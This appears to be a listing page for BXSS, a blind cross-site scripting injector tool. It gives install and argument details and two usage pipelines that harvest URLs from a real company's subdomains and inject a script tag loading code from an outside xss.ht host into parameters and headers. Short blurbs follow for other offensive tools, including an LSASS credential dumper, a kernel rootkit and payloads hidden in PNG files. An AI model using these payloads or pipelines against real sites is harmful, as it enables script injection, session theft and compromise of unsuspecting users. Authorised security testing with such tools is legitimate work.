BXSS is a blind XSS injector tool.
Features
Install
$ go get -u github.com/ethicalhackingplayground/bxss
Arguments
— Coded by @z0idsec —
-appendMode
Append the payload to the parameter
-concurrency int
Set the concurrency (default 30)
-header string
Set the custom header (default “User-Agent”)
-parameters
Test the parameters for blind xss
-payload string
the blind XSS payload
$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload ‘”><script src=https://hacker.xss.ht></script>’ -parameters
$ subfinder uber.com | gau | bxss -payload ‘”><script src=https://z0id.xss.ht></script>’ -header “X-Forwarded-For”
bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…
Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…
Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…
Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…
shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…
Extract and execute a PE embedded within a PNG file using an LNK file. The…